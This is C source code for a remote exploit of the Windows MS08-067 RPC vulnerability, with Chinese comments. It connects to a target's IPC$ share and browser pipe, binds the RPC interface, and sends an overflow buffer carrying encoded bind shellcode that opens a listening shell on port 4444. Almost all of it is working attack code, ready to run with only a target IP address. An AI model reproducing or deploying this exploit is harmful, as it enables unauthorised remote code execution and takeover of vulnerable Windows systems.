MS08-067

// MS08-067 Exploit 冷却整理//// [Microsoft Visual C++ .NET] 编译通过// [WindowsXP SP2 简体中文纯净版] 测试通过,但成功率并不是100%// 漏洞分析参见 http://blog.csdn.net/iiprogram/article/details/3156229#include <stdio.h>#include <stdlib.h>#include <winsock2.h>#include <Rpc.h>#pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "Rpcrt4.lib")#pragma comment(lib, "mpr.lib")struct RPCBIND{BYTE  VerMaj;BYTE  VerMin;BYTE  PacketType;BYTE  PacketFlags;DWORD DataRep;WORD  FragLength;WORD  AuthLength;DWORD CallID;WORD  MaxXmitFrag;WORD  MaxRecvFrag;DWORD AssocGroup;BYTE  NumCtxItems;WORD  ContextID;WORD  NumTransItems;GUID  InterfaceUUID;WORD  InterfaceVerMaj;WORD  InterfaceVerMin;GUID  TransferSyntax;DWORD SyntaxVer;};/*struct RPCFUNC{BYTE  VerMaj;BYTE  VerMin;BYTE  PacketType;BYTE  PacketFlags;DWORD DataRep;WORD  FragLength;WORD  AuthLength;DWORD CallID;DWORD AllocHint;WORD  ContextID;WORD  Opnum;};*/BYTE PRPC[0x48] = {0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};BYTE POP[] = //stub header RPCFUNC structure"\x05\x00""\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01""\x00\x00\x00\x00\x1f\x00""\x00\x00\x00\x00""\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00""\x5c\x00""\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // 
74"\x90\x90""\x90\x90\x90\x90""\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41""\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41""\x00\x00\x00\x00\x01\x00""\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00""\x00\x00""\x01\x00\x00\x00\x01\x00\x00\x00";unsigned char bind_shellcode[] =// "\xCC"// "\x83\xEC\x40" // sub esp, 
0x70"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad""\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5""\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1""\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3""\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62""\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1""\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1""\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a""\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a""\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48""\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19""\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab""\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22""\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03""\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d""\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a""\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67""\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5""\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b""\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a""\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a""\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";BYTE EXPLOIT[] ="\x05\x00""\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00""\x00\x00\x00\x00\x1f\x00""\x00\x00\x00\x00""\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00""\x5c\x00""\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00""\x41\x41""\x41\x41\x41\x41""\x41\x41\x41\x41""\x41\x41\x41\x41""\x41\x41\x41\x41""\x12\x45\xfa\x7f" // jmp esp"\x90\x8B\xF4\x81""\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1""\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"// 
"\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41""\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41""\x00\x00\x00\x00\x01\x00""\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00""\x00\x00""\x01\x00\x00\x00\x01\x00\x00\x00";int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer){BYTE rbuf[256] = "";DWORD dw = 0;struct RPCBIND RPCBind;memcpy(&RPCBind, &PRPC, sizeof(RPCBind));UuidFromString((unsigned char *)Interface, &RPCBind.InterfaceUUID);RPCBind.InterfaceVerMaj = atoi(&InterfaceVer[0]);RPCBind.InterfaceVerMin = atoi(&InterfaceVer[2]);TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);return 0;}void usage(char* argv[]){printf("=============================================\n");printf("\tMS08-067 远程溢出Exploit\n\n");printf("  溢出成功后侦听端口:4444\n");printf("  使用方法:%s {IP}\n", argv[0]);printf("=============================================\n");}int main(int argc, char* argv[]){char* server = NULL;char unc[MAX_PATH];char szPipe[MAX_PATH];WSADATA wsa;NETRESOURCE nr;HANDLE hFile;BYTE rbuf[256] = "";DWORD dw = 0;if ( argc != 2 ){usage(argv);return -1;}server = argv[1];if ( WSAStartup(MAKEWORD(2,2), &wsa) != 0 ){printf("初始化Socket出错\n");return -1;}_snprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server);nr.dwType = RESOURCETYPE_ANY;nr.lpLocalName = NULL;nr.lpRemoteName = unc;nr.lpProvider = NULL;printf("连接 %s ipc$ ...", server);if ( WNetAddConnection2(&nr, "", "", 0) != 0 ){printf("失败!\n");return -1;}else{printf("成功!\n");}_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", server);printf("打开 \\\\%s\\pipe\\browser ...", server);hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);if ( hFile == (HANDLE)(-1) ){printf("失败!\n");return -1;}else{printf("成功!\n");}printf("Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n");BindRpcInterface(hFile, "4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0");PVOID ptr = (PVOID)&POP;memcpy((char*)ptr+74, bind_shellcode, 
sizeof(bind_shellcode)-1);printf("发送 shellcode ...\n");TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP)-1, rbuf, sizeof(rbuf), &dw, NULL);printf("发送 溢出块 ...\n");TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT)-1, rbuf, sizeof(rbuf), &dw, NULL);CloseHandle(hFile);return 0;}
